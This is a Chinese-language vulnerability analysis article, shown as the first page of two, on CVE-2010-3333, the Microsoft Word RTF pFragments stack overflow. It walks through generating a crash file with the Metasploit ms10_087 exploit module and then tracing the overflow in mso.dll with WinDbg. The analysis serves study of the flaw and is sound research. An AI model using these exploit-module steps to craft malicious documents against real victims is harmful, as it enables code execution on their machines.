欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

CVE-2010-3333分析[漏洞战争]

来源:本站整理 作者:佚名 时间:2017-05-15 TAG: 我要投稿

CVE-2010-3333漏洞是一个栈溢出漏洞,该漏洞是由于Microsoft word在处理RTF数据的对数据解析处理错误,可被利用破坏内存,导致任意代码执行。

首先使用metsaploit生成crash poc

msf > search CVE-2010-3333
[!] Module database cache not built yet, using slow search

Matching Modules
================

 Name Disclosure Date Rank Description
 ---- --------------- ---- -----------
 exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 2010-11-09 great MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)


msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
msf exploit(ms10_087_rtf_pfragments_bof) > show options

Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):

 Name Current Setting Required Description
 ---- --------------- -------- -----------
 FILENAME msf.rtf yes The file name.


Exploit target:

 Id Name
 -- ----
 0 Automatic


msf exploit(ms10_087_rtf_pfragments_bof) > info

 Name: MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
 Module: exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
 Platform: Windows
 Privileged: No
 License: Metasploit Framework License (BSD)
 Rank: Great
 Disclosed: 2010-11-09

Provided by:
 wushi of team509
 unknown
 jduck <jduck@metasploit.com>
 DJ Manila Ice, Vesh, CA

Available targets:
 Id Name
 -- ----
 0 Automatic
 1 Microsoft Office 2002 SP3 English on Windows XP SP3 English
 2 Microsoft Office 2003 SP3 English on Windows XP SP3 English
 3 Microsoft Office 2007 SP0 English on Windows XP SP3 English
 4 Microsoft Office 2007 SP0 English on Windows Vista SP0 English
 5 Microsoft Office 2007 SP0 English on Windows 7 SP0 English
 6 Crash Target for Debugging

Basic options:
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 FILENAME msf.rtf yes The file name.

Payload information:
 Space: 512
 Avoid: 1 characters

Description:
 This module exploits a stack-based buffer overflow in the handling
 of the 'pFragments' shape property within the Microsoft Word RTF
 parser. All versions of Microsoft Office 2010, 2007, 2003, and XP
 prior to the release of the MS10-087 bulletin are vulnerable. This
 module does not attempt to exploit the vulnerability via Microsoft
 Outlook. The Microsoft Word RTF parser was only used by default in
 versions of Microsoft Word itself prior to Office 2007. With the
 release of Office 2007, Microsoft began using the Word RTF parser,
 by default, to handle rich-text messages within Outlook as well. It
 was possible to configure Outlook 2003 and earlier to use the
 Microsoft Word engine too, but it was not a default setting. It
 appears as though Microsoft Office 2000 is not vulnerable. It is
 unlikely that Microsoft will confirm or deny this since Office 2000
 has reached its support cycle end-of-life.

References:
 http://cvedetails.com/cve/2010-3333/
 http://www.osvdb.org/69085
 http://technet.microsoft.com/en-us/security/bulletin/MS10-087
 http://www.securityfocus.com/bid/44652
 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880

msf exploit(ms10_087_rtf_pfragments_bof) > set target 6
target => 6
msf exploit(ms10_087_rtf_pfragments_bof) > run

[*] Creating 'msf.rtf' file ...
[+] msf.rtf stored at /root/.msf4/local/msf.rtf
msf exploit(ms10_087_rtf_pfragments_bof) >

分析

直接打开后发生访问违例

rep movs dword ptr es:[edi], dword ptr [esi] 是把esi指向的内存拷贝ecx个大小到edi指向的内存中,可以看出异常是因为拷贝的目的地址为READONLY,看到调用栈也被破坏了,所以是一个在 mso.dll 中发生的栈溢出漏洞。

然后在 30ed442c 下短点,看调用栈。先用 sxe ld:mso 在mso被加载的时候断下,再下 30ed442c 的断点,然后看调用栈。

0:000> kb
ChildEBP RetAddr Args to Child 
WARNING: Stack unwind information not available. Following frames may be wrong.
00123ea8 30f0b56b 00124014 00000000 ffffffff mso!Ordinal1246+0x16b0
00123ed8 30f0b4f9 00124060 00124014 00000000 mso!Ordinal1273+0x2581
00124124 30d4d795 00000000 00124164 00000000 mso!Ordinal1273+0x250f
0012414c 30d4d70d 30d4d5a8 00f114dc 00f11514 mso!Ordinal5575+0xf9
00124150 30d4d5a8 00f114dc 00f11514 00f113c4 mso!Ordinal5575+0x71
00124154 00f114dc 00f11514 00f113c4 30dce40c mso!Ordinal4099+0xf5
00124158 00f11514 00f113c4 30dce40c 00000000 0xf114dc
0012415c 00f113c4 30dce40c 00000000 00f11128 0xf11514
00124160 30dce40c 00000000 00f11128 00124f10 0xf113c4
00124164 00000000 00f11128 00124f10 00000000 mso!Ordinal2940+0x1588c

然后在调用者下断点 bp mso!Ordinal1273+0x25d8

000> t
eax=30da33d8 ebx=05000000 ecx=00123e98 edx=00000000 esi=00f11100 edi=00124060
eip=30f0b5f8 esp=00123e7c ebp=00123ea8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mso!Ordinal1273+0x260e:
30f0b5f8 ff501c call dword ptr [eax+1Ch] ds:0023:30da33f4=30ed4406
0:000> dds eax
30da33d8 31242763 mso!Ordinal3247+0x2f
30da33dc 30e7bc33 mso!Ordinal2616+0x26c
30da33e0 30ef0964 mso!Ordinal1010
30da33e4 3124278c mso!Ordinal3247+0x58
30da33e8 312427a4 mso!Ordinal3247+0x70
30da33ec 30f1c4bc mso!Ordinal2200+0x9ed
30da33f0 30d20504 mso!Ordinal379+0x1e6
30da33f4 30ed4406 mso!Ordinal1246+0x168a
30da33f8 30e652fc mso!Ordinal3403+0x829
30da33fc 30e83d38 mso!Ordinal985+0x60e
30da3400 312427fc mso!Ordinal3247+0xc8
30da3404 30e65344 mso!Ordinal3403+0x871
30da3408 30e82c90 mso!Ordinal1959+0x256
30da340c 30fb6964 mso!Ordinal1319+0x3a
30da3410 31242814 mso!Ordinal3247+0xe0
30da3414 30e7598b mso!Ordinal1418+0x213c
30da3418 30e75961 mso!Ordinal1418+0x2112
30da341c 30f392da mso!Ordinal3288+0x8c7
30da3420 312428c3 mso!Ordinal3247+0x18f
30da3424 90909090
30da3428 30da34a0 mso!Ordinal2841+0x82fc
30da342c 30da3558 mso!Ordinal2841+0x83b4
30da3430 30da3620 mso!Ordinal2841+0x847c
30da3434 30da37a0 mso!Ordinal2841+0x85fc
30da3438 30da3970 mso!Ordinal2841+0x87cc
30da343c 30da3c80 mso!Ordinal2841+0x8adc
30da3440 30da3f18 mso!Ordinal2841+0x8d74
30da3444 30da42c8 mso!Ordinal2841+0x9124
30da3448 30da4650 mso!Ordinal2841+0x94ac
30da344c 30da48a8 mso!Ordinal2841+0x9704
30da3450 30da49b0 mso!Ordinal2841+0x980c
30da3454 30da4b18 mso!Ordinal2841+0x9974

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载